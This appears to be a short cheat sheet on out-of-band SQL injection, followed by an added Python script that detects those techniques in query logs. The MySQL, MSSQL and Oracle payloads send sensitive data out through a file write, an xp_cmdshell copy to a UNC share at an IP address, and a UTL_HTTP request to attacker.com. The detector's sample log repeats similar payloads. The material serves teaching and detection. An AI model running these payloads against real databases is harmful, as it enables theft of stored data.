SQL Injection

Out-of-band Injection

MySQL and MariaDB

SELECT sensitive_data FROM users INTO OUTFILE '/tmp/out.txt';

Microsoft SQL Server (MSSQL)

EXEC xp_cmdshell 'bcp "SELECT sensitive_data FROM users" queryout "\\10.10.58.187\logs\out.txt" -c -T';

Oracle

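DECLARE
  req UTL_HTTP.REQ;
  resp UTL_HTTP.RESP;
BEGIN
  -- sensitive_data is a placeholder for the value appended to the URL
  req := UTL_HTTP.BEGIN_REQUEST('http://attacker.com/exfiltrate?sensitive_data=' || sensitive_data);
  -- GET_RESPONSE is a function, so its result must be assigned
  resp := UTL_HTTP.GET_RESPONSE(req);
  -- close the response to release the connection
  UTL_HTTP.END_RESPONSE(resp);
END;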
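
Each statement above depends on one database feature for its out-of-band channel: file output in MySQL, xp_cmdshell with a UNC path in MSSQL, and UTL_HTTP in Oracle. As an added example (not part of the original page), this Python check flags those features in logged statements; the log format, function names and sample lines are assumptions constructed for illustration.

```python
import re

# Features behind the page's three out-of-band channels, keyed by DBMS.
OOB_PATTERNS = {
    "mysql": [("INTO OUTFILE/DUMPFILE", re.compile(r"\bINTO\s+(OUT|DUMP)FILE\b", re.I))],
    "mssql": [
        ("xp_cmdshell", re.compile(r"\bxp_cmdshell\b", re.I)),
        ("UNC path", re.compile(r"\\\\[\w.-]+\\[\w$.-]+")),
    ],
    "oracle": [("UTL_HTTP call", re.compile(r"\bUTL_HTTP\s*\.\s*\w+", re.I))],
}

def normalize(sql):
    """Neutralise SQL comments so keyword splitting does not hide a match."""
    sql = re.sub(r"/\*!\d*", " ", sql)                # MySQL executable comment: body still runs, keep it
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)  # ordinary comment: drop it
    return sql.replace("*/", " ")                     # closer left behind by an executable comment

def scan(dbms, sql):
    """Return the names of out-of-band features found in one logged statement."""
    text = normalize(sql)
    return [name for name, rx in OOB_PATTERNS.get(dbms, []) if rx.search(text)]

# Constructed sample log of (dbms, statement) pairs; not real traffic.
SAMPLE_LOG = [
    ("mysql", "SELECT name FROM users WHERE id = 7"),
    ("mysql", "SELECT sensitive_data FROM users INTO/**/OUTFILE '/tmp/out.txt'"),
    ("mssql", r"""EXEC xp_cmdshell 'bcp "SELECT 1" queryout "\\198.51.100.7\logs\o.txt" -c -T'"""),
    ("oracle", "BEGIN req := UTL_HTTP.BEGIN_REQUEST('http://collector.example/x'); END;"),
]

def alerts(log):
    """Return (line index, dbms, matched features) for every statement that matches."""
    return [(i, dbms, hits) for i, (dbms, sql) in enumerate(log) if (hits := scan(dbms, sql))]

if __name__ == "__main__":
    for idx, dbms, hits in alerts(SAMPLE_LOG):
        print(f"line {idx} [{dbms}]: {', '.join(hits)}")
```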